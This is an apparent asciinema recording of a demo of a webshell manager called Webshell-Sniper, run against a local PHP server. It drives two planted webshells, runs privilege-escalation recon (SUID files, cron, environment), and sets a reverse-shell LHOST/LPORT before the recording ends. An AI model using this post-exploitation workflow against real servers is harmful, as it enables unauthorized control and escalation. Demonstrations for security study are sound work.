{"version": 2, "width": 104, "height": 32, "timestamp": 1782492137, "env": {"TERM": "xterm-256color", "SHELL": "/bin/bash"}}
[0.1391, "o", "\u001b[95m[+] Checking POST http://127.0.0.1:8080/index.php (password='c') ...\u001b[0m\r\n"]
[0.1419, "o", "\u001b[1;32m[+] Webshell is alive.\u001b[0m\r\n"]
[0.1421, "o", "\u001b[95m[+] Checking POST http://127.0.0.1:8080/c2.php (password='c') ...\u001b[0m\r\n"]
[0.1441, "o", "\u001b[1;32m[+] Webshell is alive.\u001b[0m\r\n"]
[0.1442, "o", "\u001b[1;32m[+] 2 webshell(s) online. Entering interactive mode.\u001b[0m\r\n"]
[0.1537, "o", "\u001b[?12l\u001b[?25h"]
[0.1578, "o", "\r\n===================================================\r\n           ____        _\r\n          / ___| _ __ (_)_ __   ___ _ __\r\n          \\___ \\| '_ \\| | '_ \\ / _ \\ '__|\r\n           ___) | | | | | |_) |  __/ |\r\n          |____/|_| |_|_| .__/ \\___|_|\r\n                      |_|\r\n===================================================\r\n|      WebShell Manager Via Terminal (v2.0.0)     |\r\n|  https://github.com/WangYihang/Webshell-Sniper  |\r\n===================================================\r\n\r\n"]
[0.1585, "o", "\u001b[6n"]
[0.1602, "o", "\u001b[?2004h\u001b[?1l\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ >\u001b[16D\u001b[17C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[0.1627, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.215, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.2768, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.3383, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.3999, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.4615, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.5235, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.5852, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.647, "o", "\u001b[?25l\u001b[?7l\u001b[7D\u001b[0;32msessions\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.7088, "o", "\u001b[?25l\u001b[?7l\u001b[25D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ > \u001b[0;32msessions\u001b[25D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.7089, "o", "\u001b[?2004l"]
[3.7117, "o", "\u250f\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\r\n\u2503\u001b[1;36m \u001b[0m\u001b[1;36m \u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36mid\u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36mmethod\u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36murl                            \u001b[0m\u001b[1;36m \u001b[0m\u2503\r\n\u2521\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\r\n\u2502 * \u2502 0  \u2502 POST   \u2502 http://127.0.0.1:8080/index.php \u2502\r\n\u2502   \u2502 1  \u2502 POST   \u2502 http://127.0.0.1:8080/c2.php    \u2502\r\n\u2514\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\r\n"]
[3.7122, "o", "\u001b[6n"]
[3.7129, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ >\u001b[16D\u001b[17C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.7136, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.7224, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102messions\u001b[7D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.7841, "o", "\u001b[?25l\u001b[?7l\u001b[0my\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.8456, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.9075, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.9693, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.0311, "o", "\u001b[?25l\u001b[?7l\u001b[0mf\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.0931, "o", "\u001b[?25l\u001b[?7l\u001b[6D\u001b[0;36msysinfo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.155, "o", "\u001b[?25l\u001b[?7l\u001b[24D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ > \u001b[0;36msysinfo\u001b[24D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[6.1567, "o", "\u001b[1;32m[+] ========================================\u001b[0m\r\n"]
[6.1568, "o", "\u001b[1;32m[+] URL           : http://127.0.0.1:8080/index.php\u001b[0m\r\n"]
[6.1568, "o", "\u001b[1;32m[+] Method        : POST\u001b[0m\r\n"]
[6.1584, "o", "\u001b[1;32m[+] Document root : /var/www/html\u001b[0m\r\n"]
[6.1596, "o", "\u001b[1;32m[+] PHP version   : 8.3.31\u001b[0m\r\n"]
[6.1666, "o", "\u001b[1;32m[+] Kernel        : Linux 5dd92056d40a 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May  5 \u001b[0m\r\n\u001b[1;32m19:26:24 UTC 2026 x86_64 GNU/Linux\u001b[0m\r\n"]
[6.1675, "o", "\u001b[6n"]
[6.1687, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ >\u001b[16D\u001b[17C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.1701, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.1606, "o", "\u001b[?25l\u001b[?7l\u001b[0mg\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.2231, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.2855, "o", "\u001b[?25l\u001b[?7l\u001b[0mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.3479, "o", "\u001b[?25l\u001b[?7l\u001b[0mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.4103, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.4728, "o", "\u001b[?25l\u001b[?7l\u001b[5D\u001b[0;36mgetuid\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.5352, "o", "\u001b[?25l\u001b[?7l\u001b[23D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ > \u001b[0;36mgetuid\u001b[23D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[8.5362, "o", "\u001b[95m[+] [exec] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[8.5402, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\n"]
[8.541, "o", "\u001b[6n"]
[8.542, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ >\u001b[16D\u001b[17C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.5432, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.152, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.2145, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;32mcd\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.2771, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.3402, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.4032, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.4662, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.5287, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.5903, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.6522, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.7139, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.7755, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.8372, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.899, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[10.9608, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.0226, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.0845, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.1464, "o", "\u001b[?25l\u001b[?7l\u001b[33D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] ~ > \u001b[0;32mcd\u001b[0m \u001b[0;33m/var/www/html\u001b[33D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.1464, "o", "\u001b[?2004l"]
[11.1505, "o", "\u001b[1;32m[+] cwd: /var/www/html\u001b[0m\r\n"]
[11.1512, "o", "\u001b[6n"]
[11.1525, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.1539, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.5616, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.624, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.6867, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.7493, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.8113, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mrecon\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.873, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.9348, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.9964, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[13.0583, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[13.1199, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[13.1815, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[13.2443, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[13.3069, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[13.3693, "o", "\u001b[?25l\u001b[?7l\u001b[42D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mrecon\u001b[0m \u001b[0;33mprivesc\u001b[42D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[13.3693, "o", "\u001b[?2004l"]
[13.3704, "o", "\u001b[95m[+] [enum] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[13.5254, "o", "\u001b[1;32m[+] == whoami ==\u001b[0m\r\n"]
[13.5255, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n"]
[13.5256, "o", "\u001b[1;32m[+] == sudo ==\u001b[0m\r\n"]
[13.5256, "o", "sh: 1: sudo: not found\r\n"]
[13.5257, "o", "\u001b[1;32m[+] == kernel ==\u001b[0m\r\n"]
[13.5259, "o", "Linux 5dd92056d40a 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May  5 19:26:24 UTC 2026 x86_64\r\nGNU/Linux\r\n"]
[13.526, "o", "\u001b[1;32m[+] == cron ==\u001b[0m\r\n"]
[13.5262, "o", "total 20\r\ndrwxr-xr-x 1 root root 4096 Jun 11 00:28 .\r\ndrwxr-xr-x 1 root root 4096 Jun 23 10:35 ..\r\n-rwxr-xr-x 1 root root  539 Jan 27 22:53 apache2\r\n-rwxr-xr-x 1 root root 1478 Jun 24  2025 apt-compat\r\n-rwxr-xr-x 1 root root  123 Dec 16  2025 dpkg\r\n"]
[13.5263, "o", "\u001b[1;32m[+] == capabilities ==\u001b[0m\r\n"]
[13.5264, "o", "sh: 1: getcap: not found\r\n"]
[13.5266, "o", "\u001b[1;32m[+] == suid ==\u001b[0m\r\n"]
[13.5268, "o", "/usr/bin/chsh\r\n/usr/bin/newgrp\r\n/usr/bin/mount\r\n/usr/bin/umount\r\n/usr/bin/gpasswd\r\n/usr/bin/passwd\r\n/usr/bin/chfn\r\n/usr/bin/su\r\nfind: '/var/cache/apt/archives/partial': Permission denied\r\nfind: '/var/cache/ldconfig': Permission denied\r\nfind: '/etc/ssl/private': Permission denied\r\nfind: '/root': Permission denied\r\n"]
[13.5269, "o", "\u001b[1;32m[+] == listening ==\u001b[0m\r\n"]
[13.527, "o", "sh: 1: netstat: not found\r\n"]
[13.5271, "o", "\u001b[1;32m[+] == env ==\u001b[0m\r\n"]
[13.5278, "o", "APACHE_CONFDIR=/etc/apache2\r\nHOSTNAME=5dd92056d40a\r\nPHP_INI_DIR=/usr/local/etc/php\r\nSHLVL=0\r\nPHP_LDFLAGS=-Wl,-O1 -pie\r\nAPACHE_RUN_DIR=/var/run/apache2\r\nPHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64\r\nPHP_VERSION=8.3.31\r\nAPACHE_PID_FILE=/var/run/apache2/apache2.pid\r\nGPG_KEYS=1198C0117593497A5EC5C199286AF1F9897469DC C28D937575603EB4ABB725861C0779DC5C0A9DE4 \r\nAFD8691FDAEDF03BDF6E460563F15A9B715376CA\r\nPHP_ASC_URL=https://www.php.net/distributions/php-8.3.31.tar.xz.asc\r\nPHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64\r\nPHP_URL=https://www.php.net/distributions/php-8.3.31.tar.xz\r\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\r\n"]
[13.5278, "o", "APACHE_LOCK_DIR=/var/lock/apache2\r\nLANG=C\r\nAPACHE_RUN_GROUP=www-data\r\nAPACHE_RUN_USER=www-data\r\nAPACHE_LOG_DIR=/var/log/apache2\r\nPWD=/var/www/html\r\nPHPIZE_DEPS=autoconf            dpkg-dev                file            g++             gcc             "]
[13.5278, "o", "\r\nlibc-dev                make            pkg-config              re2c\r\nPHP_SHA256=66410cee07f4b2baeb0843140bb2a2b52ef930b5cf9b3d6e6d158b33aae8fa37\r\nAPACHE_ENVVARS=/etc/apache2/envvars\r\n"]
[13.5287, "o", "\u001b[6n"]
[13.5299, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[13.5313, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.5814, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102mysinfo\u001b[6D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.6439, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[C\u001b[0;38;2;102;102;102msions\u001b[6D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.7062, "o", "\u001b[?25l\u001b[?7l\u001b[2D\u001b[0;32mset\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.7691, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.831, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mL\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.8929, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mH\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.9548, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mO\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.0167, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mS\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.0788, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mT\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.1417, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.2042, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.2671, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m7\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.329, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m2\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.3915, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.4536, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.5159, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m6\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.578, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.6402, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.7026, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.7644, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.8261, "o", "\u001b[?25l\u001b[?7l\u001b[49D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mset\u001b[0m \u001b[0;33mLHOST\u001b[0m \u001b[0;33m172.16.1.1\u001b[49D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.8261, "o", "\u001b[?2004l"]
[16.8269, "o", "\u001b[1;32m[+] LHOST => 172.16.1.1\u001b[0m\r\n"]
[16.8275, "o", "\u001b[6n"]
[16.8282, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.8289, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.5332, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102met LHOST 172.16.1.1\u001b[19D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.5949, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.6568, "o", "\u001b[?25l\u001b[?7l\u001b[2D\u001b[0;32mset\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.7185, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.7802, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mL\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.8422, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mP\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.9039, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mO\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.9657, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mR\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.0273, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mT\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.0891, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.1509, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.2127, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.2745, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.3361, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.3977, "o", "\u001b[?25l\u001b[?7l\u001b[43D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mset\u001b[0m \u001b[0;33mLPORT\u001b[0m \u001b[0;33m4444\u001b[43D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[18.3984, "o", "\u001b[1;32m[+] LPORT => 4444\u001b[0m\r\n"]
[18.3989, "o", "\u001b[6n"]
[18.3995, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.4003, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.1055, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102met LPORT 4444\u001b[13D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.168, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.2305, "o", "\u001b[?25l\u001b[?7l\u001b[2D\u001b[0;32mset\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.2931, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.3555, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mD\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.4177, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mB\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.4798, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m_\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.5417, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mE\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.6036, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mN\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.6655, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mG\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.7274, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mI\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.7891, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mN\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.8512, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mE\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.913, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[19.9748, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.0366, "o", "\u001b[?25l\u001b[?7l\u001b[0;33my\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.0985, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.1609, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mq\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.2228, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.2845, "o", "\u001b[?25l\u001b[?7l\u001b[48D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mset\u001b[0m \u001b[0;33mDB_ENGINE\u001b[0m \u001b[0;33mmysql\u001b[48D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[20.2851, "o", "\u001b[1;32m[+] DB_ENGINE => mysql\u001b[0m\r\n"]
[20.2857, "o", "\u001b[6n"]
[20.2863, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.2871, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
